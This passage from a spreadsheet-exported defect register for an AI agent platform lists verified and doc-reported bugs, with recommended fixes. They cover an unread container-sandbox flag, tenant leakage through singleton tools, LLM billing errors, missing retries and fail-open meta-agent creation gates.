  <si>
    <t>TX-01</t>
  </si>
  <si>
    <t>The per-company sandbox flag is never read</t>
  </si>
  <si>
    <t>09. Tools &amp; the Tool Registry</t>
  </si>
  <si>
    <t>### TX-01 — The per-company sandbox flag is never read
**✅ Verified · Critical**
This one changes how [TL-01](TOOL-LAYER-DEFECTS.md#tl-01--the-default-sandbox-runs-llm-authored-code-as-the-backend-os-user)
should be fixed, so read it before starting that work.
`sandbox.container_runtime_enabled` is declared in `DEFAULTS` with a value of **`True`**
and a comment saying it is "globally enabled as of Phase 12 go-live". An operator reading
the admin Feature Flags page sees container sandboxing switched on.
The runtime decides differently:
```python
def _container_runtime_selected(context):
    if context is not None and "container_runtime" in context:
        return bool(context["container_runtime"])
    return bool(settings.SANDBOX_CONTAINER_RUNTIME_ENABLED)   # default False
```
The flag reaches this function **only** through `context["container_runtime"]`. Grepping</t>
  </si>
  <si>
    <t>the whole backend for `container_runtime` outside `runtime.py` and `container_runtime.py`
returns exactly one line: the flag's own declaration in `feature_flags.py`.
**No caller ever threads it into the tool context.** So the per-company flag is inert, and
the only thing that decides is `settings.SANDBOX_CONTAINER_RUNTIME_ENABLED`, which
defaults to `False`.
Net effect: the feature flag says container sandboxing is on, the code default says it is
off, off wins, and LLM-authored code runs as the backend OS user — exactly the situation
TL-01 describes, but with an extra layer of misleading configuration on top.
- [`ai/core/feature_flags.py:102`](../../../backend/src/ai/core/feature_flags.py:102) — the flag, default `True`
- [`ai/tools/sandbox/runtime.py:285`](../../../backend/src/ai/tools/sandbox/runtime.py:285) — `_container_runtime_selected`
- [`common/config.py`](../../../backend/src/common/config.py) — `SANDBOX_CONTAINER_RUNTIME_ENABLED = False`
**Fix:** thread the resolved per-company flag into the tool context, **or** delete the
flag and use the setting alone. Do not leave two switches where one is invisible and the
visible one is a lie. This is a prerequisite for the TL-01 fix, alongside
[TL-16](TOOL-LAYER-DEFECTS.md#tl-16--the-tenant-workspace-lives-in-tmp-and-is-node-local).</t>
  </si>
  <si>
    <t>09-TOOLS-DEFECTS.md</t>
  </si>
  <si>
    <t>3. Additions not in the deep register</t>
  </si>
  <si>
    <t>TX-02</t>
  </si>
  <si>
    <t>Tool instances are process-wide singletons</t>
  </si>
  <si>
    <t>### TX-02 — Tool instances are process-wide singletons
**✅ Verified · High**
`ToolRegistry.register(tool)` stores the **instance**: `cls._tools[tool.name] = tool`.
There is one object per tool for the life of the process, shared by every concurrent run
of every tenant.
Any tool that assigns per-call state to `self` — a company id, a resolved credential, a
working directory, an HTTP client bound to one tenant's token — leaks that state across
concurrent runs.
Nothing in the base class prevents it and nothing in review catches it. The tools README
warns about it in prose; the type system does not.
- [`ai/tools/base.py`](../../../backend/src/ai/tools/base.py) — `ToolRegistry.register`
**Fix:** make the registry store a factory, or freeze the instance after registration so
an attribute write raises. The second is a few lines and catches the mistake at the moment
it happens.
---</t>
  </si>
  <si>
    <t>TX-03</t>
  </si>
  <si>
    <t>usage: "PLANNED" hides a tool from the model but not from execution</t>
  </si>
  <si>
    <t>### TX-03 — `usage: "PLANNED"` hides a tool from the model but not from execution
**📄 Doc-reported · Medium**
Tools declared `usage: "PLANNED"` are excluded from the LLM prompt — only `AUTONOMOUS` and
`BOTH` are injected. But a `PLANNED` tool named directly in a static plan step executes
normally.
So "not advertised" and "not callable" are the same word, and the safer-sounding value is
the one that offers no protection.
- [`ai/step_executor.py:725`](../../../backend/src/ai/step_executor.py:725)
**Fix:** split into two flags — `llm_callable` and `plan_callable`. Recorded in the deep
register as part of [TL-12](TOOL-LAYER-DEFECTS.md#tl-12--the-per-tool-permission-model-sits-on-a-class-nothing-uses);
noted here because the `usage` field is what an entity author actually sets.
---</t>
  </si>
  <si>
    <t>TX-04</t>
  </si>
  <si>
    <t>meta_spec_critic is a Tool that is not in the registry</t>
  </si>
  <si>
    <t>### TX-04 — `meta_spec_critic` is a `Tool` that is not in the registry
**📄 Doc-reported · Low**
It is instantiated directly rather than registered, so `ToolRegistry.get_tool` will never
find it. Anyone auditing "which tools can run" from the registry will miss it, and anyone
looking for it by name will conclude it does not exist.
- [`ai/tools/meta/spec_critic.py`](../../../backend/src/ai/tools/meta/spec_critic.py)
---</t>
  </si>
  <si>
    <t>TX-05</t>
  </si>
  <si>
    <t>register_tenant_tool logs at INFO on every registration</t>
  </si>
  <si>
    <t>### TX-05 — `register_tenant_tool` logs at INFO on every registration
**✅ Verified · Low**
`logger.info(f"Registered tenant tool '{tool.name}' for company {cid}")` fires on every
tenant tool registration. Since tenant tools are registered per process and lost on
restart ([TL-10](TOOL-LAYER-DEFECTS.md#tl-10--tenant-scoped-tools-are-unreachable-by-construction)),
a busy multi-worker deployment writes this line repeatedly for tools that are then never
reachable.
Minor on its own; listed because the log line is the main evidence an operator has that
tenant tools "work".
- [`ai/tools/base.py`](../../../backend/src/ai/tools/base.py) — `register_tenant_tool`
---</t>
  </si>
  <si>
    <t>TX-06</t>
  </si>
  <si>
    <t>get_tools_for_company merges correctly and has no execution caller</t>
  </si>
  <si>
    <t>### TX-06 — `get_tools_for_company` merges correctly and has no execution caller
**✅ Verified · Medium**
`ToolRegistry` has three lookup methods:
| Method | Takes `company_id` | Called from the execution path |
|---|---|---|
| `get_tool` | optional | yes — but **always without it** |
| `get_tools_for_company` | required | **no** |
| `get_visible_tools_for_company` | required | **no** — only a unit test |
So the registry offers two correct, tenant-aware lookups and the executor uses neither.
This is the mechanical root of fault **A** and of
[TL-10](TOOL-LAYER-DEFECTS.md#tl-10--tenant-scoped-tools-are-unreachable-by-construction):
the capability exists at the registry and is not reached from the caller.
- [`ai/tools/base.py`](../../../backend/src/ai/tools/base.py) — the three methods
- [`ai/tool_executor.py`](../../../backend/src/ai/tool_executor.py) — the caller
---</t>
  </si>
  <si>
    <t>LP-01</t>
  </si>
  <si>
    <t>cost_unit: per_1k_tokens over-bills by 1000×</t>
  </si>
  <si>
    <t>10. LLM Providers, Routing &amp; Integrations</t>
  </si>
  <si>
    <t>### LP-01 — `cost_unit: per_1k_tokens` over-bills by 1000×
**✅ Verified · Critical**
The divisor is chosen by substring matching on `cost_unit`:
```python
if "1m token" in unit_lower or "per_million" in unit_lower or "million" in unit_lower:
    divisor = Decimal("1000000.0")
elif "1k token" in unit_lower:
    divisor = Decimal("1000.0")
elif "1000 char" in unit_lower:
    divisor = Decimal("1000.0")
```
Note the asymmetry. The million branch accepts `per_million` — the underscore form. The
thousand branch matches only `"1k token"` **with a space**.
So `cost_unit = "per_1k_tokens"` matches nothing, `divisor` stays `1.0`, and the cost is
computed as `internal_cost × token_count` instead of `internal_cost × token_count / 1000`
— a **1000× over-charge** on every row.</t>
  </si>
  <si>
    <t>The credentials guide uses the underscore form in its examples.
- [`ai/usage_service.py:89`](../../../backend/src/ai/usage_service.py:89)–100
**Fix:** normalise the unit string before matching, and add a validator on the
integration-create endpoint that rejects any `cost_unit` the divisor logic does not
recognise. Silently defaulting to a divisor of 1 is the wrong failure mode for a pricing
field.
---</t>
  </si>
  <si>
    <t>10-LLM-PROVIDERS-DEFECTS.md</t>
  </si>
  <si>
    <t>2. T0 — Money and availability</t>
  </si>
  <si>
    <t>LP-02</t>
  </si>
  <si>
    <t>LLMResponse.cost_usd is hardcoded to zero</t>
  </si>
  <si>
    <t>### LP-02 — `LLMResponse.cost_usd` is hardcoded to zero
**✅ Verified · High**
```python
@property
def cost_usd(self) -&gt; float:
    """Estimated cost — placeholder for future per-model pricing."""
    return 0.0
```
The property exists on every LLM response, is named exactly what a caller would reach for,
and always returns `0.0`. Anything that bills from it silently charges nothing.
Real cost comes from `usage_service` writing an attributed `usage_logs` row from the SKU
lookup. Nothing enforces that a caller uses that path instead of the property.
- [`ai/llm/types.py:76`](../../../backend/src/ai/llm/types.py:76)
**Fix:** delete the property. A missing attribute is an immediate error; a zero is a silent
one.</t>
  </si>
  <si>
    <t>LP-03</t>
  </si>
  <si>
    <t>There is no retry, timeout or fallback anywhere in the LLM layer</t>
  </si>
  <si>
    <t>### LP-03 — There is no retry, timeout or fallback anywhere in the LLM layer
**📄 Doc-reported · Critical**
| Concern | Status |
|---|---|
| Provider fallback | not implemented — one task type, one integration, one provider |
| Retry on 429 / 5xx | not implemented — no backoff, exceptions propagate |
| Request timeout | not set — each SDK's own default applies |
| Circuit breaking | not implemented |
| Streaming (text) | not implemented |
A single rate-limit response from Azure or Vertex fails the step, which fails the
iteration, which — depending on the retry strategy — can fail the run. For the most common
transient failure in the entire system, the platform has no handling at all.
The naming actively misleads: the module is `ai/llm/router.py` and the class is
`LLMRouter`. There is also a `routing_mode` setting with a `"router"` value that does
nothing ([LP-08](#lp-08--routing_mode-is-stored-returned-and-never-read)).
- [`ai/llm/router.py`](../../../backend/src/ai/llm/router.py)</t>
  </si>
  <si>
    <t>**Fix:** wrap `adapter.generate` in a bounded retry with jitter on 429 and 5xx, and set an
explicit timeout. That is perhaps thirty lines and it changes the reliability of every run
on the platform.
---</t>
  </si>
  <si>
    <t>LP-04</t>
  </si>
  <si>
    <t>The one error handler logs a retry it does not perform</t>
  </si>
  <si>
    <t>### LP-04 — The one error handler logs a retry it does not perform
**📄 Doc-reported · High**
The only error handling in the layer is a Gemini SDK-version workaround:
```python
logger.warning(f"SDK finish_reason validation error (non-fatal), retrying with raw HTTP: {e}")
raise RuntimeError(...)
```
The log says "retrying with raw HTTP". The next line re-raises. There is no raw-HTTP retry
anywhere.
In the ReAct loop the same condition is treated as **end of turn** (`break`) instead —
so the loop silently truncates and returns whatever it had, with no error and no flag.
- [`ai/llm/gemini_adapter.py`](../../../backend/src/ai/llm/gemini_adapter.py)
---</t>
  </si>
  <si>
    <t>LP-05</t>
  </si>
  <si>
    <t>An entity model_override changes the model but not the provider</t>
  </si>
  <si>
    <t>### LP-05 — An entity `model_override` changes the model but not the provider
**📄 Doc-reported · High**
`model_override` replaces the model id and leaves the resolved provider and credentials in
place. Overriding a Gemini default with `gpt-4o` therefore sends `gpt-4o` **to Vertex AI**.
It gets worse at billing time: the `-in` / `-out` SKUs are string-concatenated from
whatever model name the adapter reports. An override with no matching SKU **bills zero**
and only logs a warning.
So a single mis-set field in the builder produces a run that either fails at the provider
or succeeds and is not charged.
**Fix:** resolve the override through the integration registry like any other model, and
refuse an override with no matching integration.
---</t>
  </si>
  <si>
    <t>LP-06</t>
  </si>
  <si>
    <t>Gemini thinking tokens are not counted</t>
  </si>
  <si>
    <t>### LP-06 — Gemini thinking tokens are not counted
**📄 Doc-reported · High**
`thoughts_token_count` is ignored in token accounting. For reasoning models, thinking
tokens are frequently the majority of the spend.
So the platform under-reports and under-bills exactly the models it routes the `thinking`
task type to.
- [`ai/llm/gemini_adapter.py`](../../../backend/src/ai/llm/gemini_adapter.py) — token accounting
---</t>
  </si>
  <si>
    <t>LP-07</t>
  </si>
  <si>
    <t>Any Claude integration fails on its first call</t>
  </si>
  <si>
    <t>### LP-07 — Any Claude integration fails on its first call
**✅ Verified · High**
`pyproject.toml` declares `google-genai` and `openai`. It does **not** declare `anthropic`.
`AnthropicAdapter._build_client` starts with:
```python
try:
    import anthropic
except ImportError:
    raise RuntimeError("anthropic package not installed. Run: pip install anthropic")
```
The adapter is complete, the provider factory wires it up, and the credentials guide
explains how to configure it. An admin can follow that guide, register an `anthropic`
integration, point the `thinking` task at it — and every call raises before reaching
Vertex AI.
Five of the nine critic-ladder entries route to Claude models.
- [`ai/llm/anthropic_adapter.py`](../../../backend/src/ai/llm/anthropic_adapter.py) — `_build_client`</t>
  </si>
  <si>
    <t>- [`backend/pyproject.toml:34`](../../../backend/pyproject.toml:34)–35
- Also recorded as **D-12** in the platform register
**Fix:** add the dependency, or remove the adapter, the factory entry and the guide section
so nobody can configure a path that cannot work.
---</t>
  </si>
  <si>
    <t>3. T1 — Configuration that cannot work</t>
  </si>
  <si>
    <t>LP-08</t>
  </si>
  <si>
    <t>routing_mode is stored, returned, and never read</t>
  </si>
  <si>
    <t>### LP-08 — `routing_mode` is stored, returned, and never read
**✅ Verified · Medium**
`ModelTaskDefault.routing_mode` is a real column with values `single` and `router`. It is
accepted by the create endpoint, persisted, and returned by the read endpoint. The
frontend renders it.
**No code reads it.** There is no fallback router to switch to. `router` and `single`
behave identically.
- [`config/models.py:76`](../../../backend/src/config/models.py:76) — the column
- [`config/router.py:225`](../../../backend/src/config/router.py:225) — write
- [`config/router.py:240`](../../../backend/src/config/router.py:240) — read
---</t>
  </si>
  <si>
    <t>LP-09</t>
  </si>
  <si>
    <t>Three task types the code uses are rejected by the API</t>
  </si>
  <si>
    <t>### LP-09 — Three task types the code uses are rejected by the API
**✅ Verified · High**
`TASK_TYPES` contains eleven values. It does **not** contain `embedding`, `vision` or
`goal_validation`. All three are used as task types in live code:
| Task type | Used at |
|---|---|
| `embedding` | [`ai/memory/embedding_service.py`](../../../backend/src/ai/memory/embedding_service.py) — model resolution step 1 |
| `vision` | [`gateway/video_gateway.py:312`](../../../backend/src/gateway/video_gateway.py:312) |
| `goal_validation` | [`ai/planning/planner_service.py:231`](../../../backend/src/ai/planning/planner_service.py:231) |
The write endpoint validates against `TASK_TYPES` and 422s on all three. So the AI Config
page renders an `Embedding` card that **can never be saved**, and the embedding service's
first resolution step can never find a row.
- [`config/models.py:11`](../../../backend/src/config/models.py:11)–23 — `TASK_TYPES`
**Fix:** add the three values. They are already in use; the list is simply out of date.</t>
  </si>
  <si>
    <t>LP-10</t>
  </si>
  <si>
    <t>Nothing is seeded, so a fresh install cannot run an agent</t>
  </si>
  <si>
    <t>### LP-10 — Nothing is seeded, so a fresh install cannot run an agent
**📄 Doc-reported · High**
`model_task_defaults` starts empty. Until an `app_admin` configures `text_generation`,
every run fails with "No model configured".
Combined with [PO-03](01-PRODUCT-OVERVIEW-DEFECTS.md#po-03--nothing-pushes-a-new-user-into-onboarding)
— nothing forces a new user into the onboarding wizard that would tell them this — a new
tenant's first experience is an agent that fails with an error that does not say what to do.
**Fix:** seed a sensible default in the same script that seeds the admin user, or make the
error message name the exact page to visit.
---</t>
  </si>
  <si>
    <t>LP-11</t>
  </si>
  <si>
    <t>service_category is free text and the code queries for different values</t>
  </si>
  <si>
    <t>### LP-11 — `service_category` is free text and the code queries for different values
**📄 Doc-reported · Medium**
`service_category` is a plain string column. The values named in the model's own column
comment — `IMAGE_GEN`, `VIDEO_GEN` — are not the values the resolution code queries for.
So an admin who follows the comment creates a row that the resolver will never find, and
gets "No model configured" for a model that is plainly configured on the screen.
**Fix:** make it an enum, and validate on write.
---</t>
  </si>
  <si>
    <t>LP-12</t>
  </si>
  <si>
    <t>Vertex requires a placeholder API key it then ignores</t>
  </si>
  <si>
    <t>### LP-12 — Vertex requires a placeholder API key it then ignores
**📄 Doc-reported · Low**
Vertex AI authenticates with application default credentials and ignores the stored key —
but `encrypted_api_key` is non-nullable, so the admin must store something. The
recommended value is the literal string `vertex-ai-service-account`.
Harmless, and worth recording because it looks exactly like a misconfiguration during
debugging.
---</t>
  </si>
  <si>
    <t>LP-13</t>
  </si>
  <si>
    <t>src/ai/core/reasoning/</t>
  </si>
  <si>
    <t>| **LP-13** | `src/ai/core/reasoning/` | Registers `REACT` and `CHAIN_OF_THOUGHT` strategies. `get_reasoning` is defined and exported and has **no callers** — the step executor branches on the mode string directly. The adapters also pass a `config=` kwarg the router silently swallows | ✅ Verified |</t>
  </si>
  <si>
    <t>LP-14</t>
  </si>
  <si>
    <t>LLMResponse.cost_usd</t>
  </si>
  <si>
    <t>| **LP-14** | `LLMResponse.cost_usd` | See [LP-02](#lp-02--llmresponsecost_usd-is-hardcoded-to-zero). Deleting it is the fix | ✅ Verified |</t>
  </si>
  <si>
    <t>LP-15</t>
  </si>
  <si>
    <t>routing_mode</t>
  </si>
  <si>
    <t>| **LP-15** | `routing_mode` | See [LP-08](#lp-08--routing_mode-is-stored-returned-and-never-read). Remove the column, the schema fields and the disabled UI control — or build the fallback router it implies | ✅ Verified |</t>
  </si>
  <si>
    <t>LP-16</t>
  </si>
  <si>
    <t>The _scrub_internal_keys reference in INTERNAL_KEYS.md</t>
  </si>
  <si>
    <t>| **LP-16** | The `_scrub_internal_keys` reference in `INTERNAL_KEYS.md` | `prompt_utils._scrub_internal_keys` does not exist. Scrubbing is inline in the step executor only. The doc sends readers to a function that was never written | 📄 Doc-reported |</t>
  </si>
  <si>
    <t>LP-17</t>
  </si>
  <si>
    <t>Tool results are paired to calls by name on two of three providers</t>
  </si>
  <si>
    <t>### LP-17 — Tool results are paired to calls by name on two of three providers
**📄 Doc-reported · High**
Gemini and Anthropic pair a tool result back to its call by **tool name**. Only Azure uses
a real call id.
Two parallel calls to the same tool — which is the normal case for `web_search` or
`batch_web_search` — mis-pair. The model then reasons over results attributed to the wrong
query, with no error anywhere.
**Fix:** carry an internal call id through the translation layer on all three providers,
and pair on that.
---</t>
  </si>
  <si>
    <t>5. T3 — Correctness in the adapters</t>
  </si>
  <si>
    <t>LP-18</t>
  </si>
  <si>
    <t>Gemini's tool-schema translation is lossy</t>
  </si>
  <si>
    <t>### LP-18 — Gemini's tool-schema translation is lossy
**📄 Doc-reported · Medium**
`oneOf`, `pattern`, `default`, `format` and numeric bounds are all discarded, and integer
`enum` values become strings.
So a tool that carefully constrains its inputs presents a much weaker contract to Gemini
than to Azure, and the model produces arguments the tool then has to rescue — which is a
large part of why so much tool code is defensive parsing
([TX-I2](09-TOOLS-DEFECTS.md#tx-i2--one-dispatch-path-schema-derived-from-the-params-model)).
---</t>
  </si>
  <si>
    <t>LP-19</t>
  </si>
  <si>
    <t>A ReAct loop that hits the turn cap returns normally</t>
  </si>
  <si>
    <t>### LP-19 — A ReAct loop that hits the turn cap returns normally
**📄 Doc-reported · Medium**
`MAX_REACT_TURNS = 12`. On exhaustion the loop returns normally, with possibly-empty
output and **no flag**.
The caller cannot distinguish "the model finished" from "the model was cut off mid-task".
Every downstream critic and status decision treats them the same.
---</t>
  </si>
  <si>
    <t>LP-20</t>
  </si>
  <si>
    <t>top_p is silently dropped in every ReAct path</t>
  </si>
  <si>
    <t>### LP-20 — `top_p` is silently dropped in every ReAct path
**📄 Doc-reported · Low**
Only the single-turn `generate()` honours it. Setting it in the builder and using `REACT`
— the default reasoning mode — has no effect.
---</t>
  </si>
  <si>
    <t>LP-21</t>
  </si>
  <si>
    <t>_get_app_company_id is LIMIT 1 with no ordering</t>
  </si>
  <si>
    <t>### LP-21 — `_get_app_company_id` is `LIMIT 1` with no ordering
**📄 Doc-reported · Medium**
The APP-company credential fallback picks a row with no `ORDER BY`. Two APP companies
means a non-deterministic fallback — a run could use either one's key, and therefore
either one's cost basis.
Related: `get_integration_by_provider` uses `ILIKE '%name%'`, a substring match that can
pick up an unrelated provider whose name contains the search term.
---</t>
  </si>
  <si>
    <t>LP-22</t>
  </si>
  <si>
    <t>The API-key cache is per process and busted only locally</t>
  </si>
  <si>
    <t>### LP-22 — The API-key cache is per process and busted only locally
**📄 Doc-reported · Medium**
The TTL cache is in-process with a 60-second TTL, and invalidation on key rotation only
clears the local copy. After a rotation, **other workers keep serving the old key for up
to 60 seconds** — and the old key is usually the one that was just revoked.
So a key rotation produces up to a minute of failing runs on every worker that did not
handle the rotation request.
---</t>
  </si>
  <si>
    <t>LP-23</t>
  </si>
  <si>
    <t>The FinishReason monkey-patch mutates the installed SDK at import</t>
  </si>
  <si>
    <t>### LP-23 — The FinishReason monkey-patch mutates the installed SDK at import
**📄 Doc-reported · Medium**
Importing `src.ai.llm.types` patches `google-genai`'s `FinishReason` enum in place. It is
a workaround for an SDK validation bug, and it is invisible from the call site.
Anyone upgrading `google-genai` will not know it exists until something behaves oddly, and
any other library in the process that reads that enum gets the patched version.
---</t>
  </si>
  <si>
    <t>LP-24</t>
  </si>
  <si>
    <t>Multimodal input does not work</t>
  </si>
  <si>
    <t>### LP-24 — Multimodal input does not work
**📄 Doc-reported · Medium**
The adapters only build text parts. The video gateway works around this by base64-encoding
a JPEG **into the user prompt string** and requesting `task_type="vision"` — a task type
that does not exist ([LP-09](#lp-09--three-task-types-the-code-uses-are-rejected-by-the-api)).
So the vision path is broken twice over, and the workaround puts a large base64 blob into
the prompt and therefore into `llm_interaction_logs.input_prompt`.
- [`gateway/video_gateway.py:312`](../../../backend/src/gateway/video_gateway.py:312)
---</t>
  </si>
  <si>
    <t>MI-01</t>
  </si>
  <si>
    <t>The duplicate check fails open</t>
  </si>
  <si>
    <t>11. Meta-Intelligence &amp; the Meta-Agent Board</t>
  </si>
  <si>
    <t>### MI-01 — The duplicate check fails open
**✅ Verified · High**
`check_semantic_duplicate` ends with:
```python
except Exception as e:
    logger.warning(f"Semantic duplicate check failed: {e}. Allowing creation.")
    return {"is_duplicate": False, ...}
```
Any exception — a registry-search failure, an embedding error, a database blip — is
reported as "no duplicate found" and creation proceeds.
The Curator compounds it: both anti-sprawl calls are wrapped in
`except Exception: pass`. So if the registry search breaks, duplicate protection
disappears silently and entity sprawl resumes with no signal anywhere.
- [`ai/meta/anti_sprawl.py:157`](../../../backend/src/ai/meta/anti_sprawl.py:157)
- [`ai/meta/board/curator.py`](../../../backend/src/ai/meta/board/curator.py)</t>
  </si>
  <si>
    <t>**Fix:** fail closed. A gate that cannot evaluate should refuse, not permit. If that is
too strict for a background job, at minimum emit a metric so a broken gate is visible.
---</t>
  </si>
  <si>
    <t>11-META-INTELLIGENCE-DEFECTS.md</t>
  </si>
  <si>
    <t>2. T0 — Gates that do not gate</t>
  </si>
  <si>
    <t>MI-02</t>
  </si>
  <si>
    <t>AntiSprawlGuard advises, and only one caller listens</t>
  </si>
  <si>
    <t>### MI-02 — `AntiSprawlGuard` advises, and only one caller listens
**📄 Doc-reported · High**
The guard returns a decision. It does not block anything. Enforcement depends entirely on
`MetaEntityCreatorTool` choosing to honour the result.
Any other creation path — the ordinary `POST /ai/entities`, a seed script, a clone —
bypasses all three anti-sprawl gates completely.
So the daily limit, the adaptation-chain check and the semantic duplicate check apply to
exactly one of several ways an entity can be created.
- [`ai/meta/anti_sprawl.py`](../../../backend/src/ai/meta/anti_sprawl.py)
- [`ai/tools/meta/entity_creator.py`](../../../backend/src/ai/tools/meta/entity_creator.py) — the only enforcer
**Fix:** move the check into the entity-creation service, so every path goes through it.
---</t>
  </si>
  <si>
    <t>MI-03</t>
  </si>
  <si>
    <t>The daily creation limit is company-wide with no rate limit</t>
  </si>
  <si>
    <t>### MI-03 — The daily creation limit is company-wide with no rate limit
**📄 Doc-reported · Medium**
The limit is 10 entities per company per rolling 24 hours. It is not per user and not
rate-limited within the window, so **ten entities can be created in ten seconds** and then
nothing for a day.
For a runaway Meta-Agent loop that is exactly the wrong shape: the burst is unconstrained
and the recovery is slow.
---</t>
  </si>
  <si>
    <t>MI-04</t>
  </si>
  <si>
    <t>Promoter gate G5 accepts any curator decision</t>
  </si>
  <si>
    <t>### MI-04 — Promoter gate G5 accepts any curator decision
**✅ Verified · Medium**
```python
d = getattr(decision, "decision", None)
return PromoterGateResult("G5_curator_recorded", passed=bool(d), reason="Curator decision missing" if not d else "")
```
The gate is named `G5_curator_recorded` and it checks only that a decision **exists**. A
curator decision of `CREATE` when the correct answer was `REUSE` passes identically to a
correct one.
So one of the six promotion gates is a presence check, not a correctness check — and the
name does say so, which makes it easy to over-read in the safety table.
- [`ai/meta/board/promoter.py:143`](../../../backend/src/ai/meta/board/promoter.py:143)
---</t>
  </si>
  <si>
    <t>MI-05</t>
  </si>
  <si>
    <t>A skipped test case is not a failed one</t>
  </si>
  <si>
    <t>### MI-05 — A skipped test case is not a failed one
**📄 Doc-reported · Medium**
The TestDriver runs a budget-bounded five-case suite. A suite that runs out of budget and
**skips** cases can still report `passed=True`.
Promoter gate G4 is what catches this. So the safety of the whole promotion path depends on
one gate correctly distinguishing "passed" from "did not run", and the suite result itself
is misleading if read directly.
- [`ai/meta/board/test_driver.py`](../../../backend/src/ai/meta/board/test_driver.py)
- [`ai/meta/board/promoter.py`](../../../backend/src/ai/meta/board/promoter.py) — `_g4`
**Fix:** make `passed` mean "all cases ran and passed". Report skips as a separate field.
---</t>
  </si>
  <si>
    <t>MI-06</t>
  </si>
  <si>
    <t>The Architect cannot revise, so the critic loop cannot converge</t>
  </si>
  <si>
    <t>### MI-06 — The Architect cannot revise, so the critic loop cannot converge
**✅ Verified · High**
`Architect.revise` is the role that acts on critic feedback. The base implementation:
```python
new_payload = dict(draft.payload)
meta = dict(new_payload.get("metadata_extensions") or {})
revs = list(meta.get("architect_revisions") or [])
revs.extend(concerns)
meta["architect_revisions"] = revs
```
It appends the concerns to metadata and returns. **Nothing is rewritten.** The docstring is
honest — "Override to call a real LLM for an intelligent rewrite" — and no subclass does.
So the two-round critic loop critiques a draft, hands it to the Architect, gets back the
identical draft with a note attached, and critiques it again. The expected outcome is
`BLOCK` with *"max revise rounds reached"*.
- [`ai/meta/board/architect.py`](../../../backend/src/ai/meta/board/architect.py) — `revise`</t>
  </si>
  <si>
    <t>**Fix:** either wire the Meta-Agent runtime entity in as the rewriter, or stop running the
revise loop — three critiques that cannot change anything is three LLM calls per attempt
for no benefit.
---</t>
  </si>
  <si>
    <t>3. T1 — Roles that do not do their job</t>
  </si>
  <si>
    <t>MI-07</t>
  </si>
  <si>
    <t>MAX_REVISE_ROUNDS = 2 means three critiques</t>
  </si>
  <si>
    <t>### MI-07 — `MAX_REVISE_ROUNDS = 2` means three critiques
**📄 Doc-reported · Medium**
The loop is `range(max_rounds + 1)`. So the constant named "max revise rounds" produces one
more critique than it reads as.
Combined with [MI-06](#mi-06--the-architect-cannot-revise-so-the-critic-loop-cannot-converge),
that is three billed critic calls per spec, all of which see the same draft.
- [`ai/meta/board/critic.py`](../../../backend/src/ai/meta/board/critic.py)
---</t>
  </si>
  <si>
    <t>MI-08</t>
  </si>
  <si>
    <t>Five of seven Board roles never call an LLM</t>
  </si>
  <si>
    <t>### MI-08 — Five of seven Board roles never call an LLM
**📄 Doc-reported · Low**
Only the Critic and (potentially) the Architect call a model; the TestDriver spends by
executing. The other five are deterministic.
That is a good design — it is recorded here because "seven-role board" reads as seven
reasoning agents, and both the cost model and the failure modes are quite different from
that.
---</t>
  </si>
  <si>
    <t>MI-09</t>
  </si>
  <si>
    <t>Semantic similarity alone can never trigger reuse</t>
  </si>
  <si>
    <t>### MI-09 — Semantic similarity alone can never trigger reuse
**📄 Doc-reported · Medium**
Semantic score carries weight 0.35 in the four-phase scorer, and the ADAPT threshold is
0.60. A **perfect** semantic match therefore scores 0.35 and falls short.
So the reuse engine cannot recommend reuse on semantic grounds alone, no matter how
identical the request. Reuse requires the other signals — name, tags, tool overlap — to
agree.
That may be intentional, but it means the semantic search that costs an embedding call on
every request cannot by itself change any decision.
- [`ai/meta/registry_search_service.py`](../../../backend/src/ai/meta/registry_search_service.py) — weights and thresholds
---</t>
  </si>
  <si>
    <t>MI-10</t>
  </si>
  <si>
    <t>Curator ↔ anti-sprawl key mismatch</t>
  </si>
  <si>
    <t>| **MI-10** | Curator ↔ anti-sprawl key mismatch | The guard returns `existing_entity_id`; the Curator reads `dup.get('similar_id','?')`. The rationale shown to a human **always displays `?`** instead of the duplicate's id — which is the one piece of information the reviewer needs | ✅ Verified |</t>
  </si>
  <si>
    <t>4. T2 — Wiring and documentation errors</t>
  </si>
  <si>
    <t>MI-11</t>
  </si>
  <si>
    <t>The MetaIntelligenceTree has no entity_id</t>
  </si>
  <si>
    <t>| **MI-11** | The MetaIntelligenceTree has no `entity_id` | Any query filtering on `entity_id` finds nothing. The correct filter is `scope_level=TENANT`. Easy to get wrong, and the failure is an empty result rather than an error | 📄 Doc-reported |</t>
  </si>
  <si>
    <t>MI-12</t>
  </si>
  <si>
    <t>The README says six tree sections; there are seven</t>
  </si>
  <si>
    <t>| **MI-12** | The README says six tree sections; there are seven | `composition` is missing from the README table | 📄 Doc-reported |</t>
  </si>
  <si>
    <t>MI-13</t>
  </si>
  <si>
    <t>meta_spec_critic is a Tool outside the registry</t>
  </si>
  <si>
    <t>| **MI-13** | `meta_spec_critic` is a `Tool` outside the registry | Instantiated directly, so `ToolRegistry.get_tool` never finds it. Also recorded as [TX-04](09-TOOLS-DEFECTS.md#tx-04--meta_spec_critic-is-a-tool-that-is-not-in-the-registry) | 📄 Doc-reported |</t>
  </si>
  <si>
    <t>MI-14</t>
  </si>
  <si>
    <t>Synthesised tools register tenant-scoped and are unreachable</t>
  </si>
  <si>
    <t>| **MI-14** | Synthesised tools register tenant-scoped and are unreachable | `tool_synthesis_pipeline` registers a `DRAFT` tool with `register_tenant_tool`. The executor never passes `company_id`, so the tool cannot be resolved even in the process that registered it — see [TL-10](TOOL-LAYER-DEFECTS.md#tl-10--tenant-scoped-tools-are-unreachable-by-construction) | ✅ Verified |</t>
  </si>
  <si>
    <t>MI-15</t>
  </si>
  <si>
    <t>Tree sections cap at 200 rows and drop the oldest silently</t>
  </si>
  <si>
    <t>### MI-15 — Tree sections cap at 200 rows and drop the oldest silently
**📄 Doc-reported · Medium**
Each MetaIntelligenceTree section is LRU-pruned at 200 rows on `last_seen`. Old
anti-patterns, prompt candidates and calibration rules disappear with no record.
For anti-patterns in particular this is the wrong policy: a rare failure mode that has not
recurred in a while is exactly the one worth remembering, and it is the first to be
evicted.
**Fix:** prune on age with a floor on high-confidence rows, or archive rather than delete.
---</t>
  </si>
  <si>
    <t>5. T3 — Silent data loss and tuning traps</t>
  </si>
  <si>
    <t>MI-16</t>
  </si>
  <si>
    <t>Tool synthesis runs its test harness outside the sandbox</t>
  </si>
  <si>
    <t>### MI-16 — Tool synthesis runs its test harness outside the sandbox
**✅ Verified · Critical**
Recorded in full as
[TL-02](TOOL-LAYER-DEFECTS.md#tl-02--tool-synthesis-executes-generated-code-outside-the-sandbox).
Summarised here because it belongs to this subsystem:
